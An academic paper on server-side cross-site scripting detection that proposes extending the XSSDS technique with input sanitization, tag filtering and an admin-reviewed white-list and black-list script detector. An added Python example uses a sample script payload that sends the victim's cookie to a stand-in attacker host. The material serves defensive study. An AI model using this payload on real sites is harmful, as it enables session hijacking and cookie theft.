
Advanced Approach on XSSDS Technique

Sara Tuza
Department of Information Security
Naif Arab University for Security Science
Riyadh, Saudi Arabia
4370887@nauss.edu.sa

Shatha Alarabi
Department of Information Security
Naif Arab University for Security Science
Riyadh, Saudi Arabia
4370882@nauss.edu.sa

Sara Alamri
Department of Information Security
Naif Arab University for Security Science
Riyadh, Saudi Arabia
4370892@nauss.edu.sa

Dr. Nisreen Innab
Department of Information Security
Naif Arab University for Security Science
Riyadh, Saudi Arabia
Nisreen.innab@nauss.edu.sa

Abstract— To build web applications, developers rely on several technologies, the most common being HTML, XHTML and JavaScript. Vulnerabilities in the way these technologies are used give rise to many attacks on web applications. The most important and most common of these is Cross-Site Scripting (XSS), a code injection attack that lets an attacker execute a malicious script in another user's browser. Once the script runs, the attacker can perform session hijacking, malware spreading, cookie theft and malicious redirection, because the script embedded in the page executes whenever the page is loaded. In this paper we describe the different types of XSS attack and their impact on both the server and the client side. We then select three server-side detection techniques, explain how each one works and identify its main weaknesses, and finally take one of them, XSSDS, and propose an advanced approach that covers its weaknesses.

Keywords- cross-site scripting; XSS; XSSDS; security attack; detection techniques; persistent XSS; non-persistent XSS; server-side approach

I. INTRODUCTION

Web applications have become the most widespread means of delivering information and services around the globe, in particular for health care, banking, e-commerce and similar sectors. However, they contain vulnerabilities that an attacker can exploit for malicious purposes. Our job is therefore to protect users' confidential information and maintain the integrity of web applications.

One of the best-known web application vulnerabilities is Cross-Site Scripting (XSS), which, as shown in Figure 1, is ranked third in the OWASP top ten web application security risks [1]. (That ranking is the one from the 2013 edition of the list; the 2017 edition moves XSS to seventh place, A7.)

Figure 1. Top ten OWASP vulnerabilities.

Cross-site scripting (XSS) is one of the most powerful tools available to an attacker. By injecting a malicious script wherever HTML is generated, the attacker can insert their own HTML or modify the application's page so that the victim is captured or redirected while waiting for the page to load. Attackers use bait such as short videos, links or any other content likely to catch the user's attention in order to move the user from one page to another, at which point the attacker may gain access to all of the client's confidential information [2].

A. Persistent or Stored XSS Attack

Persistent XSS, shown in Figure 2, is also known as stored XSS: the malicious script persists on the website and usually

978-1-5386-4110-1/18/$31.00 ©2018 IEEE


has malicious code stored in the website database. The script then becomes part of the web application and runs in every user's browser unless the application filters it. This type is considered more harmful than the others and is often hard to detect, because all users of the web application are affected rather than one specific user: simply visiting the page compromises the victim, and no malicious link is needed for exploitation.

Figure 2. Persistent or Stored XSS Attack.

B. Non-Persistent or Reflected XSS Attack

Non-persistent XSS, also known as reflected XSS (Figure 3), is, as the name implies, not stored in the website; it affects only the users who cause the injected code to run. Typically the developer has forgotten to protect the data the application reflects back. The attacker hides a malicious script in a URL, disguised as ordinary user input, or sends emails that entice victims to click the URL. The harmful script then executes in the victim's browser, and the attacker can carry out their malicious intent.

Figure 3. Non-Persistent or Reflected XSS Attack.

C. DOM-based XSS Attack

In DOM-based XSS (Figure 4) the attack payload modifies the DOM in the victim's browser: the page's own legitimate client-side code processes the attacker-controlled data, and the system ends up running it in an unexpected manner. Because the injection takes place entirely in the browser (the classic source is the URL fragment, which is never sent to the server), detection techniques that only inspect HTTP requests and responses on the server, such as those discussed in Section II, do not see it.

Figure 4. DOM-based XSS.

The main impacts of an XSS attack are:

• Stealing sensitive information.
• Phishing.
• Modifying user settings.
• Downloading malware.
• Cookie stealing.
• Session hijacking.

In this paper, our contributions are as follows:

• First, we address the major security issues of web applications and internet services, referring to the "Website Security Statistics Report" (2017) of OWASP.
• We present a comprehensive study of XSS attacks, describing their types and their impact.
• We address three server-side techniques that detect XSS attacks and highlight the weaknesses of each one.
• We propose an advanced approach to the XSSDS technique that covers its main weaknesses.

The rest of the paper is organized as follows. Section II addresses related work and techniques. Section III presents the models that cover the XSSDS weaknesses, and Section IV proposes the advanced approach to XSSDS obtained by adding the two new models. We conclude the paper in Section V.

II. RELATED WORK

In this section we present several XSS detection and mitigation techniques, with a brief description of each technique and the weaknesses identified in it.
A. S2XS2 Detection Technique

S2XS2 [4] is an automated server-side XSS detection technique based on "boundary injection", which encapsulates dynamically generated content, and "policy generation", which validates that content. The boundaries and policies are checked while the HTTP response is generated in order to discover XSS attacks. Its main weakness is the runtime overhead of the policy checks, which degrades the attack detection capability.

B. XSSDS Detection Technique

XSSDS [5] is a server-side detection technique for cross-site scripting attacks. It is a passive technique: it takes no steps to prevent an attack when one occurs, but discovers XSS attacks by passively monitoring HTTP traffic. The idea of XSSDS is:

• It first detects non-persistent (reflected) XSS by comparing the HTTP request parameters with the HTTP response data produced by the web application; the attack is then reduced by filtering the HTTP response.
• Second, it detects persistent (stored) XSS by maintaining a list of all scripts legitimately used in the web application and detecting deviations from that list, such as a change in the number of scripts.

The main weaknesses of this technique are two:

• It suffers from a small number of false positives.
• Its training phase for collecting the legitimate scripts is simplistic.

C. SWAP Detection Technique

SWAP [6] comprises a reverse proxy that relays all HTML traffic between the web server and the client browser. SWAP is a detection technique: it only monitors traffic in order to detect XSS attacks. It is similar to BEEP and Noncespaces, but both of those require client-side modification, whereas SWAP performs all XSS mitigation on the server side and requires no client-side changes. Its main weakness is that many different types of XSS attack cannot be detected.

III. OUR PROPOSED MODELS

In this section we propose solutions, in the form of two new models, for the weaknesses identified in the XSSDS approach:

• It suffers from a small number of false positives.
• Its training detector for the set of scripts is simplistic.

A. Input Filtration and Sanitization Model

To address the first problem, many techniques use filtration and sanitization. The older approach filtered the input and sanitized the output of the database. Implementing this technique reduced false positives but did not eliminate them, so further research was done in this area; the proposed solution keeps the same elements but moves sanitization before filtration, so that both filtration and sanitization are now applied to the client input [7].

Figure 5 shows how XSS attacks are filtered in the model; the steps are:

• The client accesses the web application from the web browser and an HTTP request is sent.
• The HTTP request carries the user's input data, which may contain malicious content.
• The sanitizer sanitizes and cleans the received input.
• The cleaned data is passed to the filtration process, where it is scanned and filtered for any HTML tag.
• Once considered safe, the input is stored in the database and the web response is generated.

Figure 5. Filtering and Sanitizing XSS input.

B. Advanced Model of Training Detector

The second problem with XSSDS is that it requires a more advanced training phase for collecting scripts. The current training detector checks every received script against its list: if the script is listed it counts as an authorized script and is passed through to the database; otherwise the training detector rejects the script and counts it as an XSS attack [5].

This detection logic is quite simple and may count many scripts as XSS attacks when they are not. We therefore add an additional layer in our approach to categorize scripts more accurately. In our approach, if a script is not in the training list, it is checked against a white script list (which holds popular, trusted web scripts). If it is on that list, an alarm is sent to the admin, who checks and verifies the script and can accept or reject it: if accepted, the script is added to the training list; if rejected, it is added to the black list and considered an XSS attack. If the script is on neither the training list nor the white script list, it is added directly to the black list and counted as an XSS attack, as shown in Figure 6.

Figure 6. Advanced Training list detector.

IV. IMPLEMENTATION

In the previous section we discussed the solution for each XSSDS weakness separately. In this section we propose an advanced version of XSSDS that combines the two models, as shown in Figure 7. Each received request goes through the following steps:

• First, the system verifies it against the training list, which maintains all scripts used in the web application.
• If the script is in the training list, it is passed directly to the filtration process.
  - Otherwise, the system verifies it against the 'white scripts list', which contains the most popular scripts that can be used in any web application.
  - If the script is in the white script list, an alert is sent to the admin and a new record is added to the log.
  - The admin can verify the script and either accept or reject it.
  - If the admin accepts it, it is added automatically to the training list and considered an authorized script; if the admin rejects it, it is added to the black list and considered an XSS attack.
• In the sanitization process, the received HTTP request passes through the sanitizer layer, which cleans the request.
• The request then passes through the filtration layer, which scans for any HTML tags and removes them.
• The request can now be considered safe and is saved in the database.
• After saving the client request in the database, the system generates the HTTP response and sends it to the client.
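The two XSSDS detectors of Section II.B and the extended training-list and sanitize-then-filter pipeline of Sections III and IV, as an added worked example. This is not code from the paper or from the XSSDS authors: scripts are modelled as normalized `<script>` elements, the admin's decision is modelled as a function call, and the application script, the CDN script, the `attacker.example` payload and the request parameters are all constructed for illustration.

```python
"""Toy model of XSSDS-style detection plus the paper's extensions.
Added example; all sample scripts and requests below are constructed."""
from __future__ import annotations

import html
import re
from dataclasses import dataclass, field

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
TAG_RE = re.compile(r"<[^>]+>")


def normalize(script: str) -> str:
    """Canonical form so whitespace and tag-case tricks do not defeat list matching."""
    return re.sub(r"\s+", " ", script).strip().lower()


def extract_scripts(document: str) -> list[str]:
    """Every <script>...</script> element in a request value or response body."""
    return [normalize(m.group(0)) for m in SCRIPT_RE.finditer(document)]


def detect_reflected(params: dict[str, str], response: str) -> list[str]:
    """XSSDS reflected detector: a script in the response that also appears
    inside a request parameter was supplied by the requester, not the app."""
    param_blob = " ".join(normalize(v) for v in params.values())
    return [s for s in extract_scripts(response) if s in param_blob]


@dataclass
class TrainingDetector:
    """Advanced training-list detector (Section III.B): training list,
    white list of popular third-party scripts, black list and an admin log."""
    training_list: set[str]
    white_list: set[str]
    black_list: set[str] = field(default_factory=set)
    log: list[str] = field(default_factory=list)

    def classify(self, script: str) -> str:
        s = normalize(script)
        if s in self.training_list:
            return "authorized"
        if s in self.white_list:          # known-popular but not yet approved here
            self.log.append(f"ALERT admin: review script {s[:40]!r}")
            return "pending_admin"
        self.black_list.add(s)            # on neither list: counted as XSS
        return "xss"

    def admin_decision(self, script: str, accept: bool) -> str:
        s = normalize(script)
        (self.training_list if accept else self.black_list).add(s)
        return "authorized" if accept else "xss"


def sanitize(value: str) -> str:
    """Sanitizer layer: HTML-escape so the input can only render as text."""
    return html.escape(value, quote=True)


def filter_tags(value: str) -> str:
    """Filtration layer: strip any HTML tag that survived the sanitizer."""
    return TAG_RE.sub("", value)


def process_request(detector: TrainingDetector, params: dict[str, str]) -> dict:
    """Section IV pipeline for one request: classify scripts, then sanitize and filter."""
    verdicts = {s: detector.classify(s) for v in params.values() for s in extract_scripts(v)}
    stored = {name: filter_tags(sanitize(value)) for name, value in params.items()}
    return {"verdicts": verdicts, "stored": stored}


# Constructed sample data (hypothetical, not from the paper).
SAMPLE_APP_SCRIPT = '<script src="/static/app.js"></script>'
SAMPLE_CDN_SCRIPT = '<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>'
SAMPLE_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


def make_detector() -> TrainingDetector:
    return TrainingDetector(training_list={normalize(SAMPLE_APP_SCRIPT)},
                            white_list={normalize(SAMPLE_CDN_SCRIPT)})


def demo() -> dict:
    det = make_detector()
    # Reflected case: the search term is echoed unescaped into the response.
    params = {"q": SAMPLE_PAYLOAD}
    response = f"<html>{SAMPLE_APP_SCRIPT}<p>Results for {SAMPLE_PAYLOAD}</p></html>"
    reflected = detect_reflected(params, response)
    # Stored case: a later page carries the app script, a CDN script and the payload.
    page = f"<html>{SAMPLE_APP_SCRIPT}{SAMPLE_CDN_SCRIPT}<div>{SAMPLE_PAYLOAD}</div></html>"
    stored = {s: det.classify(s) for s in extract_scripts(page)}
    pipeline = process_request(det, {"comment": "hi <b>there</b>" + SAMPLE_PAYLOAD})
    return {"reflected": reflected, "stored": stored, "pipeline": pipeline, "log": det.log}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Two points worth noticing when running it. First, because the sanitizer escapes `<` and `>` before the filtration layer runs, the tag filter has nothing left to strip in the paper's sanitize-then-filter order; the filter only matters for input the sanitizer leaves untouched. Second, everything here works on request parameters and response bodies, so a DOM-based payload carried in a URL fragment never reaches `detect_reflected` or `classify` at all.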

V. CONCLUSION

In this paper we have proposed an advanced approach to the XSSDS technique, which is used to detect XSS attacks, in order to cover its weaknesses. Our solution combines two proposed models, the "Filtration and Sanitization" model and the "Advanced training list" model, and should provide a satisfactory level of security against XSS attacks.

As future work, we plan to evaluate the proposed approach by implementing it and comparing it experimentally with the original XSSDS technique. Our ultimate goal is complete detection of XSS attacks.

Figure 7. Advanced Approach for XSSDS Technique.

REFERENCES

[1] OWASP, "Cross Site Scripting (XSS)," 2016-04-04. [Online]. Available: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS).
[2] OWASP, "OWASP Top 10 - 2013: The Ten Most Critical Web Application Security Risks," 2017. [Online]. Available: https://www.owasp.org/index.php/Top_10_2017-Top_10.
[3] S. Gupta and B. B. Gupta, "XSS-SAFE: A Server-Side Approach to Detect and Mitigate Cross-Site Scripting (XSS) Attacks in JavaScript Code," Arabian Journal for Science and Engineering.
[4] H. Shahriar and M. Zulkernine, "S2XS2: A server side approach to automatically detect XSS attacks," in Proc. Ninth International Conference on Dependable, Autonomic and Secure Computing, IEEE, 2011, pp. 7–17.
[5] M. Johns, B. Engelmann and J. Posegga, "XSSDS: Server-side detection of cross-site scripting attacks," in Proc. ACSAC, California, 2008, pp. 335–344.
[6] P. Wurzinger, C. Platzer, C. Ludl, E. Kirda and C. Kruegel, "SWAP: Mitigating XSS attacks using a reverse proxy," in ICSE Workshop on Software Engineering for Secure Systems, IEEE Computer Society, 2009.
[7] S. Maurya, "Positive security model based server-side solution for prevention of cross-site scripting attacks," in 2015 Annual IEEE India Conference (INDICON), 2015.
